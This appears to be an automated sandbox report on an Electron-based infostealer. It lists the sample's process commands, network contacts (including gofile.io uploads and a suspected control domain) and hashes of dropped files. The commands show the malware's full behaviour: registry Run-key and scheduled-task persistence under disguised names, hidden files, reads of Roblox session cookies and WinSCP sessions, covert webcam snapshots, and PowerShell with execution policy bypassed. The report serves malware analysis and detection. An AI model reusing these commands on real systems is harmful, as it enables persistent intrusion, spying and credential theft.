C:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\resources\app.asar.unpacked\bind\main.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "net session"

C:\Windows\system32\net.exe

net session

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption, osarchitecture | more +1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "echo %NUMBER_OF_PROCESSORS%"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic computersystem get totalphysicalmemory | more +1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic logicaldisk get size"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\more.com

more +1

C:\Windows\System32\Wbem\WMIC.exe

wmic logicaldisk get size

C:\Windows\system32\more.com

more +1

C:\Windows\System32\Wbem\WMIC.exe

wmic OS get caption, osarchitecture

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name | more +1"

C:\Windows\System32\Wbem\WMIC.exe

wmic cpu get name

C:\Windows\system32\more.com

more +1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController get name | more +1"

C:\Windows\System32\Wbem\WMIC.exe

wmic PATH Win32_VideoController get name

C:\Windows\system32\more.com

more +1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=3264 get ExecutablePath"

C:\Windows\System32\Wbem\WMIC.exe

wmic process where processid=3264 get ExecutablePath

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetupWJwS5S /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe /f"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetupWJwS5S /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe\" /F /rl highest"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetupWJwS5S /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe /f

C:\Windows\system32\cmd.exe

cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetupWJwS5S /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe\" /F /rl highest

C:\Windows\system32\schtasks.exe

schtasks /create /sc onlogon /tn WindowsDriverSetupWJwS5S /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe\" /F /rl highest

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe\"""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe\""

C:\Windows\system32\attrib.exe

"C:\Windows\system32\attrib.exe" +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\Admin\AppData\Local\app.asar.unpacked\node_modules\take-cam\prey-webcam.exe" -invalid youcam,cyberlink,google -frame 10 -outfile C:\Users\Admin\AppData\Local\Temp\soIXumC0bYmQxblBVDpF\System\cam.4424_Admin.jpg"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\Admin\AppData\Local\app.asar.unpacked\node_modules\take-cam\snapshot.exe" /T C:\Users\Admin\AppData\Local\Temp\soIXumC0bYmQxblBVDpF\System\cam.4424_Admin"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_WJwS5S.vbs\"""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Start_WJwS5S /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_WJwS5S.vbs /f"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Start_WJwS5S /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_WJwS5S.vbs /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_WJwS5S.vbs\""

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\attrib.exe

"C:\Windows\system32\attrib.exe" +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_WJwS5S.vbs

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\salut4Qld0.ps1" -RunAsAdministrator"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\salut4Qld0.ps1" -RunAsAdministrator

Network

Country Destination Domain Proto
US 8.8.8.8:53 17.53.126.40.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 dns.google udp
US 8.8.4.4:443 dns.google tcp
US 8.8.4.4:443 dns.google tcp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 189.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 4.4.8.8.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 ipinfo.io udp
GB 142.250.200.4:80 www.google.com tcp
US 34.117.186.192:443 ipinfo.io tcp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 4.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 192.186.117.34.in-addr.arpa udp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 api.gofile.io udp
FR 51.178.66.33:443 api.gofile.io tcp
US 8.8.8.8:53 store11.gofile.io udp
FR 31.14.70.247:443 store11.gofile.io tcp
US 8.8.8.8:53 hawkish.eu udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 8.8.8.8:53 github.com udp
FR 163.5.121.96:443 hawkish.eu tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
FR 163.5.121.96:443 hawkish.eu tcp
US 8.8.8.8:53 33.66.178.51.in-addr.arpa udp
DE 140.82.121.4:443 github.com tcp
US 8.8.8.8:53 247.70.14.31.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 4.121.82.140.in-addr.arpa udp
US 8.8.8.8:53 96.121.5.163.in-addr.arpa udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
FR 163.5.121.96:443 hawkish.eu tcp
FR 163.5.121.96:443 hawkish.eu tcp
FR 163.5.121.96:443 hawkish.eu tcp
FR 163.5.121.96:443 hawkish.eu tcp

Files

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\System.dll

MD5 0d7ad4f45dc6f5aa87f606d0331c6901
SHA1 48df0911f0484cbe2a8cdd5362140b63c41ee457
SHA256 3eb38ae99653a7dbc724132ee240f6e5c4af4bfe7c01d31d23faf373f9f2eaca
SHA512 c07de7308cb54205e8bd703001a7fe4fd7796c9ac1b4bb330c77c872bf712b093645f40b80ce7127531fe6746a5b66e18ea073ab6a644934abed9bb64126fea9

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\nsis7z.dll

MD5 80e44ce4895304c6a3a831310fbf8cd0
SHA1 36bd49ae21c460be5753a904b4501f1abca53508
SHA256 b393f05e8ff919ef071181050e1873c9a776e1a0ae8329aefff7007d0cadf592
SHA512 c8ba7b1f9113ead23e993e74a48c4427ae3562c1f6d9910b2bbe6806c9107cf7d94bc7d204613e4743d0cd869e00dafd4fb54aad1e8adb69c553f3b9e5bc64df

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\chrome_100_percent.pak

MD5 9c1b859b611600201ccf898f1eff2476
SHA1 87d5d9a5fcc2496b48bb084fdf04331823dd1699
SHA256 53102833760a725241841312de452c45e43edd60a122546105ab4020ccef591b
SHA512 1a8ec288e53b9d7e43d018995abe4e3d9c83d329d0561fbb7d022e8b79ffecf033e995b9bc6af352a71c646a1e8afba4addb54deab7455f24b7a279a3dd7c336

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\chrome_200_percent.pak

MD5 b51a78961b1dbb156343e6e024093d41
SHA1 51298bfe945a9645311169fc5bb64a2a1f20bc38
SHA256 4a438f0e209ac62ffa2c14036efdd5474b5ecaa7cbf54110f2e6153abdfb8be9
SHA512 23dedde25ad9cb5829d4b6092a815712788698c2a5a0aefb4299675d39f8b5e2844eabd1ea42332a0408bd234548f5af628e7e365ab26f3385ebfa158cdd921d

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\d3dcompiler_47.dll

MD5 ce37826b135e8ffac65adbe08fe90b03
SHA1 d2fdf0e4a67986c7adfac0387641c6e6e872b227
SHA256 f0c073064d42b6b8b1be8ab4fbe740649cd696150371b8ba0d0f28cdf44ab602
SHA512 91e83dd73809f6b7ddc7dec2577232c1c683acf0d31152ffbb607941429cabef8580b40707ffa02c721d36b5ef8654d6b8c7af8ab687ddc5608b69be8c438468

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\libEGL.dll

MD5 8352fd22f09b873193cabc2932be92f0
SHA1 5bd2b58854b279f1733c5f54ea2669ee8a888d9e
SHA256 14a4aaa010be14762edfee01fd1f6b9943471eb7a2f9011a2b5c230461cd129c
SHA512 7281e980f2e82f1cc8173d9f8387a97f6e23ec5099ed8dca02222c4e17fa4cfef59d6aa300b1cf06d502bdcf77d9a6dbb08ad6658ae0a28ae6f9f995109da0d2

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\icudtl.dat

MD5 b4ce4322ba45c6ca8bede9f0048574dc
SHA1 a44534739fe1df40ba27b40aa479040e6e7b8d10
SHA256 1868b6cf8b1368233610cb7d48aab849ebec43e87b8d1fc890ac061450e79c27
SHA512 dfb452fea2647da26b3e25b349c64f7431e53741e8889ca551b39e2fe43c8629befaac067929160a39658faa70757b8ba114ae865c64fbbd37b0222b9dad4c59

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\ffmpeg.dll

MD5 b3e06973e4ae021dc699c243b4e4ec9e
SHA1 7ae27e0d4c04e7ffb906f3907b8918320439a952
SHA256 953472f2fa38d64c27944c08a8afe9da7d8b45e6e5cad7affea4360c4a888817
SHA512 0cfb6c543ef88641a2360732aa306349e5aa80113466298036dc615e30e187e01e346e8735afe937144b09f4e4101c0b99b394c790d051d8a39c8ce50a32dfdb

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\libGLESv2.dll

MD5 0b8665410e1aaa0795e10b2897c8c292
SHA1 dc336e3fd9a0a4c063e615270e2a018970589f4d
SHA256 be5b579021c5e9b41246292f448f080ff08cac0ef35a0675289f03005265d589
SHA512 7298377aafb5e6884f5fc40d9228fecdc33f313e3d06c0a34c7bf59f3e079732005c0d647ab407b94ad746a5eb9df10ab80212a80b116e3bd9371d7ee23682f6

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\resources.pak

MD5 a561422eefa9e83251dcc5c203d6f93b
SHA1 caed29b7d60629be67e81f68bf3e9da1fc200f33
SHA256 6653d98e6e5c72b2fac79f238b690655e66c92ae70c4dabf8759bafb13c67d7b
SHA512 3885363c2c462936e4aceb98791897067aa1ad6cbe0f4b7064849fca130efcee90085413790bbccef5b10a52dfb13fe8a1b188ed3aca30ea32b2e145113d0fd8

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\LICENSES.chromium.html

MD5 658ab25cd60a609dbc9bb076deabb440
SHA1 2e3bc61f1a2ef8ae71f69385e3c28b4d26849dd5
SHA256 cd902e2a5a909949406175664745c64e546d66a292e222c8164f6812b31f6824
SHA512 d3daba6843cbed276b3e4c47c9312dec7ae1f0656358a7a4944f53acfb34cbf25f310675fac69e1f382e1aeafa052e68a67d2d6fb1b554a5cec81e2d12d1e1b4

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\LICENSE.electron.txt

MD5 4d42118d35941e0f664dddbd83f633c5
SHA1 2b21ec5f20fe961d15f2b58efb1368e66d202e5c
SHA256 5154e165bd6c2cc0cfbcd8916498c7abab0497923bafcd5cb07673fe8480087d
SHA512 3ffbba2e4cd689f362378f6b0f6060571f57e228d3755bdd308283be6cbbef8c2e84beb5fcf73e0c3c81cd944d01ee3fcf141733c4d8b3b0162e543e0b9f3e63

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\snapshot_blob.bin

MD5 c9ab741bbef53fa0e84952b8891a5f5a
SHA1 e2dcb8d034e07243537c86371de0c52bce62cee1
SHA256 4d82fe1e642fe3ca7ad1a173f806088c0652ecfe9f0f6f6e246066e15a3431d4
SHA512 177b98a3090ecfe4b4598dfcd7e8b3ca49efafba4dbd8d6c6d0def462de47c3fabfde831725622783ddc177de982de6115178d9bd9830d918bb544a5a4c27fc9

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\v8_context_snapshot.bin

MD5 47014c0f81bad6d216c617c9c63bf040
SHA1 7bb483fdc5fed3c6ed437d9fe6e5023bc38201bf
SHA256 e1249d05bfc73c645b27d269f47b6923b33a3cf8088a8ca78b3b637c90f58178
SHA512 052d86cf3305a9e493bd2472e6b7ddab5e0291efd6d899984a79bae46e5fa4bd21157e19ab4a2591c9cff9069de568bad18c7baf4f35d117c77134e635466f87

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\TatsuBeta.exe

MD5 737d0d355e7876e61f9474e4e3b69b01
SHA1 fbfcc0cab41cd7eaa3a89ec8e2c0317c67a95da9
SHA256 892ce8d183fd099fa0a8dd8e5b12071963f7628788f4b70124a1f9e44496e2cc
SHA512 0c98129fd06b00095bdfcc04329254e95a150323b6f3154ec8de4ef51321a07ab46d5b404b4b6a2f2de619068423efcec3f33454c8876106617e2743d9d102ae

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\vk_swiftshader_icd.json

MD5 8642dd3a87e2de6e991fae08458e302b
SHA1 9c06735c31cec00600fd763a92f8112d085bd12a
SHA256 32d83ff113fef532a9f97e0d2831f8656628ab1c99e9060f0332b1532839afd9
SHA512 f5d37d1b45b006161e4cefeebba1e33af879a3a51d16ee3ff8c3968c0c36bbafae379bf9124c13310b77774c9cbb4fa53114e83f5b48b5314132736e5bb4496f

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\vulkan-1.dll

MD5 b91586bd80e057a7f62bdc4422744812
SHA1 a1df644421ece2e740e5bf0ed98b4f269fd85c39
SHA256 8ba72d98e0f78b77bda7816cd7232809d287310d34e0f1d7472b9d5fda2c6d02
SHA512 94f0a8e3e75e4803891c0fcb257052dbe0e7399772fc7a46ab802629f76ee580ed30b3678fa6bc3744c12cf9f3103bbc8276e88f6711278748148e9fbeef2053

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\vk_swiftshader.dll

MD5 b8ae135bcb9db1b654813b1884f8647a
SHA1 9a41592cc27a3a0944c24051c6239bb28f663b72
SHA256 4e5f6604bbd8b0f6636a59b6093bb6b093266f791012c02849786c487cd0c266
SHA512 238be31a75790ce78d9ee116b04cfa9d95aaea9e62eb4c3d684f7db63c43d6e76c3ce99142cf48b8f0b3f7def4358fe653f47a057de4e310358ba0416ae47fa8

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\locales\ar.pak

MD5 6f3e791b4d35ee7d9515614d128752cf
SHA1 181ec3a84fb3e89336d77f24f562a2cbe07619d8
SHA256 e9df0fa338b763a3926c4ee3a87bedf650fa618b6fcf0560c3f5ffe891d48c60
SHA512 3657e610d13a2c938558ec320c298dd490c9e4895ccd304f738aaa2f050373efd7382ca402365f93d23ed488bae82de2d859da788dc8faa8e621346a278f4441

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\locales\bg.pak

MD5 5ba0c7200362c9ed55610cc8b66ef53c
SHA1 d45239c2f1b00885407771a41a7776fc1fe8fa3b
SHA256 2339ff55464b4ff704fc3c5bf281eec52a539c494bd059cf0346d9c05ab7cda7
SHA512 6229dbf08a9322c4ec8de4912aa1832f01800a71b7e3ef5870e7fa2b623be4dd248fec4881c3e031e984616147be84d42ab3dd970ae56dc1bd78913a8682a37a

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\locales\am.pak

MD5 e18a450ef034b42599341c3d09f280f1
SHA1 2001c8a85904962ac3a96938eccc69ad2c110fdf
SHA256 7c2b9098130f1f9e0cf4507b64c0e96ac6354bd6c3616be20e2067cfccc820da
SHA512 ddd87571218fe9f179a6c2a8a15b182625a71a7c19ed90c0969ca2e0e9bad823b926f8b8a6b390cb6fe9c95f4b6c1f1ec7b5167a8424ab1921943922208f798a

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\locales\bn.pak

MD5 47c95e191e760dee3ef43345577e2379
SHA1 609634315270a91d4ec631642b18bd0036367aad
SHA256 ceed32e429ed1018d4c49343cf52105cbfd1e877c531a5738fd6e6cd33d27da7
SHA512 46b5f8d58780d19e79136c31a67d075c57ddf7e6a1eb197dea4088cc414a0dc24a68fc8ebcaac03b3940af2461123b586706d5dbf8dbdf6fbea0f7bec466db21

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\locales\cs.pak

MD5 3cfd9dc564cfcc33cc5524711365c376
SHA1 2e5016d2643017f37658262122974429f18625a2
SHA256 8be34e4f8226c1dd4e725711ddd884ef4476560f7863edcf378573dde9db3cee
SHA512 6ee156d2fa3b6f601df28e38968d0eae2812d70b41333348dbecd833d5ee6ff944183f0eecde96be433cf1e98c8ec22d6a6d5af5153145842175ab43c73533ef

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\locales\ca.pak

MD5 423651c45566cd90ea5edd8631e823b8
SHA1 13bed4173a08bcbfefba034aada3d838eece6d16
SHA256 7a39af99d55a1ea838d8d78c5f0da3e1402f9404d32255e31b676ceed4f0e414
SHA512 e09085023beaa37e9d5f7fdf3c32d0c001672b85e2826f0aba9a662ce958ac93cac17bf63495a604e47cb407b1593049388a4bf1b22b2339ead84a206a10569f

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\locales\da.pak

MD5 55a8f5883805a65c854d25edb3959209
SHA1 d4b3b6bd2a26cbd021fa931d1f63c9ea64e2c268
SHA256 e190187adcbb5f829d162660968ba598ed17bd11339062ca4d807deec8a27fdb
SHA512 4e1f9e6da32f553cbc8cf162726d7aba9e23e2216d6d05b995cf19fff3aafa05ed08fce29b2f8538d46583366402b8630672e650dfbd46952a611e9db0d8016d

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\locales\el.pak

MD5 4bfc3f59e32613d55232c721234d3cfa
SHA1 5fb67b8630090195f86bd6243c5439010fc65570
SHA256 e2b0b0e11c500db708ea160dd967cb57ad4c5c80c83f2be4a4c49094e65299eb
